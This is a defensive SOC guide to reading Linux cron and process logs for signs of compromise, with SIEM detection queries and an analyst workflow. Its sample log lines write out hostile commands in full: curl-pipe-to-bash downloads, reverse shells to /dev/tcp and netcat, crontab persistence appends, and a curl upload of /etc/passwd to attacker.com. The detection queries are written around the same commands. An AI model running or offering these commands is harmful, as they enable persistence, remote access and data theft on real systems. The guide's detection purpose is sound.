Cron logs and process execution logs are two of the most important Linux telemetry sources for detecting persistence, malware execution, privilege escalation, cryptominers, rootkits, lateral movement, and automated attacker activity.
Together, they expose what ran, when it ran, who ran it, and whether it was scheduled or triggered manually.
This chapter is a full-scale, ultra-practical SOC guide to cron logs and process logs using real examples, attacker footprints, SIEM queries, and investigation workflows.
Cron Logs (Scheduled Task Logs)
Cron is the Linux job scheduler. Attackers frequently use it to create persistent backdoors, run malware repeatedly, or maintain access even after reboots.
Cron logs tell the SOC:
-
What scheduled tasks run on the system
-
When a task executed
-
Which user executed it
-
Whether a job was modified
-
Whether attackers added their own tasks
Cron logs live in:
Debian/Ubuntu:
/var/log/syslog
/var/log/cron.log (if enabled)
RHEL/CentOS:
/var/log/cron
Real-World Cron Log Examples
Below are raw entries exactly how SOC analysts see them.
1. Legitimate Cron Job
Jan 10 03:04:01 ubuntu CRON[1444]: (root) CMD (apt update)
2. Attacker Persistence via Cron
Jan 10 03:12:09 ubuntu CRON[1552]: (root) CMD (/usr/bin/curl http://185.33.10.2/m.sh | bash)
Interpretation:
-
Root cron executed malware download
-
Classic cryptominer / botnet technique
3. Reverse Shell via Cron
Jan 10 03:11:00 ubuntu CRON[1540]: (root) CMD (/bin/bash -i >& /dev/tcp/185.22.91.22/4444 0>&1)
If attackers gain root, cron is one of the easiest persistence routes.
4. Malicious Script Execution Every Minute
CRON[2002]: (root) CMD (/tmp/.hidden/script.sh)
High-frequency tasks = automated persistence.
5. Newly Added Cron Job (Attacker Action)
CMD (echo "* * * * * root /tmp/rootkit" >> /etc/crontab)
This is directly visible in syslog.
6. Malicious User Cron (Crontab -e)
CRON[1844]: (mayur) CMD (/home/mayur/.scripts/backdoor.py)
User-level persistence is common in low-privilege compromises.
Files That Store Cron Schedules
Attackers modify these locations:
System-wide cron jobs:
/etc/crontab
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
User cron jobs:
/var/spool/cron/crontabs/<username>
SOC analysts check these paths whenever compromise is suspected.
Process Logs
Linux logs process creation and termination indirectly across:
-
/var/log/syslog
-
/var/log/messages
-
Audit logs (
/var/log/audit/audit.log) -
Kernel logs
-
Process accounting
-
systemd journal
These logs capture:
-
Process execution
-
Process IDs
-
Parent processes
-
Users launching commands
-
Kernel activity
-
Daemon activity
-
Service restarts
Attackers leave clear traces here.
Real Process Execution Logs
1. Suspicious Bash Execution
Jan 10 03:44:12 ubuntu bash[2221]: executing ./rootkit.sh
The SOC immediately checks /rootkit.sh.
2. Reverse Shell Execution
Jan 10 03:45:09 ubuntu bash[2331]: uid=0 gid=0 euid=0 executing /bin/bash -c "bash -i >& /dev/tcp/185.22.33.11/4444 0>&1"
Classic attacker signature.
3. Malware or Miner Execution
Jan 10 03:47:11 ubuntu systemd[1]: Started xmrig.service.
Xmrig = cryptominer.
4. Python Backdoor Execution
python3 /tmp/backdoor.py
Backdoors often run from /tmp.
5. Service Manipulation
systemd[1]: Stopped ufw.service
Attacker disabling firewall = serious indicator.
6. Process Spawn History (journald)
systemd[2331]: Started Session 23 of user mayur.
Useful for reconstructing timelines.
How Attackers Abuse Cron & Processes
1. Persistence
echo "* * * * * root /tmp/bd.sh" >> /etc/crontab
2. Scheduled Malware Download
CRON[1233]: CMD (curl http://evil.com/m | bash)
3. Automated Recon
CRON[1322]: CMD (nmap 10.0.0.0/24)
4. Maintained Reverse Shell
CRON: CMD (nc -e /bin/bash attacker.com 4444)
5. Cryptomining
systemd: Started xmrig.
6. Hidden Backdoor Execution
bash[1555]: executing /etc/.hidden/.update
SIEM Queries (Practical)
Detect malicious cron jobs
program:CRON AND (CMD:*curl* OR CMD:*wget* OR CMD:*nc* OR CMD:*bash*)
Detect cron execution from /tmp or hidden directories
CMD:*/tmp/* OR CMD:*.*
Detect reverse shells
message:"/dev/tcp"
Detect suspicious process execution
program:bash AND (message:*\.sh OR message:*python*)
Detect miner activity
message:*xmrig*
Detect firewall or security service tampering
systemd AND (Stopped ufw.service OR Stopped firewalld)
Full Attack Timeline Using Cron & Process Logs
Step 1: Brute Force (auth.log)
Failed password for root from 185.77.22.14
Step 2: Attackers Gain Root
sudo: mayur : COMMAND=/bin/bash
Step 3: Backdoor Installed
bash: executing /tmp/backdoor.py
Step 4: Cron Persistence
CRON: (root) CMD (/usr/bin/python3 /tmp/backdoor.py)
Step 5: Miner Deployment
systemd: Started xmrig.service.
Step 6: Firewall Disabled
systemd[1]: Stopped ufw.service
Step 7: Exfiltration
bash: curl -X POST -F "file=@/etc/passwd" attacker.com/upload
Cron + process logs expose the entire compromise.
Analyst Workflow (Real SOC Procedure)
-
Identify suspicious cron entries
-
Extract script paths and analyze contents
-
Identify process executions from /tmp/, hidden folders, or unknown paths
-
Check auth logs for the attacker’s initial access
-
Review sudo/su logs for escalation
-
Check systemd logs for service manipulation
-
Check for miner or botnet execution
-
Build a complete timeline
-
Validate if compromise exists
-
Escalate if malicious
This workflow is performed daily in SOC operations.
Intel Dump
-
Cron logs capture scheduled tasks; attackers use cron for persistence and automation.
-
Cron entries are found in
/var/log/syslog,/var/log/cron, and/etc/crontab. -
Process logs capture script execution, shells, malware, miners, and service modification.
-
Key indicators include curl/wget commands, reverse shells, execution from
/tmp/, new cron entries, and service tampering. -
SIEM queries detect malicious cron jobs, suspicious process executions, reverse shells, miners, and unauthorized service stops.
-
Cron + process logs reveal full attack chains including persistence, malware execution, and privilege misuse.